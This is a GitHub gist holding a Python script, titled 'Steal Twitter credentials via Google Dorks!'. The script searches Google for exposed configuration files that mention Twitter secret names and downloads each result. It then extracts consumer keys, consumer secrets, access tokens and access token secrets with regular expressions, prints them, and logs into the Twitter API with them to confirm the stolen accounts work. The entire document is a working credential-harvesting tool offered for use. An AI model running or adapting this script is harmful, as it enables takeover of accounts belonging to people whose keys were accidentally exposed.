Skip to content

Instantly share code, notes, and snippets.

@tijme
Last active June 24, 2023 19:18
Show Gist options
  • Save tijme/8a49a3e857dd74f681450e9e67aa7d1b to your computer and use it in GitHub Desktop.
Save tijme/8a49a3e857dd74f681450e9e67aa7d1b to your computer and use it in GitHub Desktop.
Steal Twitter credentials via Google Dorks!
#!/usr/bin/env python3
# pip install python-twitter
# pip install colored
# pip install google
import re
import urllib3
import twitter
import requests
import colored
import googlesearch
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
dorks = []
dork_extensions = ['yml', 'yaml', 'json', 'env', 'ini', 'cnf', 'php', 'txt']
dork_queries = [
'CONSUMER_SECRET',
'TOKEN_SECRET',
'OAUTH_TOKEN_SECRET',
'ACCESS_TOKEN_SECRET'
]
for extension in dork_extensions:
for query in dork_queries:
dorks.append('filetype:' + extension + ' "twitter" "' + query + '"')
regex_twitter_consumer_key = [
(re.compile(r'''(TWITTER_)?CONSUMER(_KEY)?("|')? *?(=|:|,) *("|')?([^\$<>\n"'{}\(\);,\[\]_=+&?|]*)("|')?(;|}|\))*?''', re.MULTILINE | re.IGNORECASE), 6),
(re.compile(r'TWITTER_CONSUMER(_KEY)?=([^<>\n]*)$', re.MULTILINE | re.IGNORECASE), 2),
(re.compile(r'''TWITTER_CONSUMER(_KEY)?("|')? ?, ?("|')([^<>\n]*?)("|')''', re.MULTILINE | re.IGNORECASE), 4),
(re.compile(r'''TWITTER_CONSUMER(_KEY)?("|')? ?= ?("|')(.*?)("|');$''', re.MULTILINE | re.IGNORECASE), 4)
]
regex_twitter_access_token_key = [
(re.compile(r'''((TWITTER_)?ACCESS_TOKEN(_KEY)?|(TWITTER_)?oauth_token)("|')? *?(=|:|,) *("|')?([^\$<>\n"'{}\(\);,\[\]_=+&?|]*)("|')?(;|}|\))*?''', re.MULTILINE | re.IGNORECASE), 8),
(re.compile(r'(TWITTER_ACCESS_TOKEN(_KEY)?|twitter_oauth_token)=([^<>\n]*)$', re.MULTILINE | re.IGNORECASE), 3),
(re.compile(r'''(TWITTER_ACCESS_TOKEN(_KEY)?|twitter_oauth_token)("|')? ?, ?("|')([^<>\n]*?)("|')''', re.MULTILINE | re.IGNORECASE), 4),
(re.compile(r'''(TWITTER_ACCESS_TOKEN(_KEY)?|twitter_oauth_token)("|')? ?= ?("|')(.*?)("|');$''', re.MULTILINE | re.IGNORECASE), 5)
]
regex_twitter_consumer_secret = [
(re.compile(r'''(TWITTER_)?CONSUMER_SECRET("|')? *?(=|:|,) *("|')?([^\$<>\n"'{}\(\);,\[\]_=+&?|]*)("|')?(;|}|\))*?''', re.MULTILINE | re.IGNORECASE), 5),
(re.compile(r'(TWITTER_CONSUMER_SECRET)=([^<>\n]*)$', re.MULTILINE | re.IGNORECASE), 2),
(re.compile(r'''(TWITTER_CONSUMER_SECRET)("|')? ?, ?("|')([^<>\n]*?)("|')''', re.MULTILINE | re.IGNORECASE), 5),
(re.compile(r'''(TWITTER_CONSUMER_SECRET)("|')? ?= ?("|')(.*?)("|');$''', re.MULTILINE | re.IGNORECASE), 4)
]
regex_twitter_access_token_secret = [
(re.compile(r'''((TWITTER_)?ACCESS(_TOKEN)?_SECRET|(TWITTER_)?TOKEN_SECRET|(TWITTER_)?oauth_token_secret)("|')? *?(=|:|,) *("|')?([^\$<>\n"'{}\(\);,\[\]_=+&?|]*)("|')?(;|}|\))*?''', re.MULTILINE | re.IGNORECASE), 9),
(re.compile(r'(TWITTER_ACCESS_TOKEN_SECRET|TWITTER_TOKEN_SECRET|twitter_oauth_token_secret)=([^<>\n]*)$', re.MULTILINE | re.IGNORECASE), 2),
(re.compile(r'''(TWITTER_ACCESS_TOKEN_SECRET|TWITTER_TOKEN_SECRET|twitter_oauth_token_secret)("|')? ?, ?("|')([^<>\n]*?)("|')''', re.MULTILINE | re.IGNORECASE), 4),
(re.compile(r'''(TWITTER_ACCESS_TOKEN_SECRET|TWITTER_TOKEN_SECRET|twitter_oauth_token_secret)("|')? ?= ?("|')(.*?)("|');$''', re.MULTILINE | re.IGNORECASE), 4)
]
def regex_ordered_array_search(regexs, content):
for regex in regexs:
try:
result = regex[0].search(content).group(regex[1])
if result:
return result
except Exception as e:
continue
return None
parsed = []
for dork in dorks:
print('------------------------------')
print('Trying dork: ' + dork)
for url in googlesearch.search(dork, num=10, stop=None, pause=2):
if url in parsed:
continue
parsed.append(url)
try:
response = requests.get(url, verify=False, timeout=5)
content = response.content.decode('utf-8')
twitter_consumer_key = regex_ordered_array_search(regex_twitter_consumer_key, content)
twitter_consumer_secret = regex_ordered_array_search(regex_twitter_consumer_secret, content)
twitter_access_token_key = regex_ordered_array_search(regex_twitter_access_token_key, content)
twitter_access_token_secret = regex_ordered_array_search(regex_twitter_access_token_secret, content)
except Exception as e:
continue
if not twitter_consumer_key:
continue
if not twitter_consumer_secret:
continue
if not twitter_access_token_key:
continue
if not twitter_access_token_secret:
continue
print('------------------------------')
print((('%s{}%s') % (colored.attr(1), colored.attr(0))).format(url))
print('\tConsumer Key: ' + twitter_consumer_key)
print('\tConsumer Secret: ' + twitter_consumer_secret)
print('\tAccess Token Key: ' + twitter_access_token_key)
print('\tAccess Token Secret: ' + twitter_access_token_secret)
api = twitter.Api(
consumer_key=twitter_consumer_key,
consumer_secret=twitter_consumer_secret,
access_token_key=twitter_access_token_key,
access_token_secret=twitter_access_token_secret
)
try:
identity = api.VerifyCredentials()
print(('%s\tName: @' + identity.screen_name + ', Last Tweet: ' + identity.created_at + '%s') % (colored.fg(2), colored.attr(0)))
except Exception as e:
print(('%s\tError: ' + str(e) + '%s') % (colored.fg(1), colored.attr(0)))
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment